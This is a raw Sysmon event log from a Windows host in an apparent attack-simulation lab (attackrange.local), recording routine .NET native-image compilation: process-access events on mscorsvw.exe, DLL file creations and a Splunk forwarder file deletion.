21:05:04.583{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A200-60D3-3A04-00000000CF01}6340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021299Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.567{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A200-60D3-3A04-00000000CF01}6340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021298Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:04.567{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A200-60D3-3A04-00000000CF01}6340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021297Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:04.520{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A200-60D3-3904-00000000CF01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021296Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.505{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A200-60D3-3904-00000000CF01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021295Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:04.505{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A200-60D3-3904-00000000CF01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021294Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:04.458{4DB9351A-A200-60D3-3804-00000000CF01}5716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1654-0\PresentationFramework-SystemCore.dll2021-06-23 21:05:04.458 10341000x800000000000000021293Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:04.395{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A200-60D3-3804-00000000CF01}5716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021292Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.380{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A200-60D3-3804-00000000CF01}5716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021291Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:04.380{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A200-60D3-3804-00000000CF01}5716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021290Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:04.301{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A200-60D3-3704-00000000CF01}3332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021289Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.286{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A200-60D3-3704-00000000CF01}3332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021288Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:04.286{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A200-60D3-3704-00000000CF01}3332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021287Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:04.176{4DB9351A-A1FF-60D3-3604-00000000CF01}7148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1bec-0\PresentationBuildTasks.dll2021-06-23 21:05:04.176 23542300x800000000000000021286Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.083{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=653754779A03447FA5D525B6BB2976AD,SHA256=BE5C1FE0E7D772E1B8849642B14931E9F7B3082D0B41469C832653A6B5A34FD7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021338Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.942{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A201-60D3-4404-00000000CF01}5048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021337Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.926{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A201-60D3-4404-00000000CF01}5048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021336Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:07.630{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A203-60D3-4B04-00000000CF01}7020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021363Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:07.489{4DB9351A-A203-60D3-4A04-00000000CF01}7048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b88-0\PresentationFramework.Royale.dll2021-06-23 21:05:07.489 23542300x800000000000000021362Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:07.489{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1389588F480FBD5FBFCD05409A09FC18,SHA256=F9B395CEB52B5F2ED9DF1D76FDA9B2A29ABDE82096F2619CC781DBD3E79C5981,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021361Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:07.287{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A203-60D3-4A04-00000000CF01}7048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021360Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:07.255{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A203-60D3-4A04-00000000CF01}7048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021359Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:07.255{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A203-60D3-4A04-00000000CF01}7048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021358Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:07.145{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A203-60D3-4904-00000000CF01}6960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021357Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:07.114{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A203-60D3-4904-00000000CF01}6960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021356Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:07.114{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A203-60D3-4904-00000000CF01}6960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021355Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:07.005{4DB9351A-A202-60D3-4804-00000000CF01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1348-0\PresentationFramework.Luna.dll2021-06-23 21:05:07.005 23542300x800000000000000021379Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:08.942{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
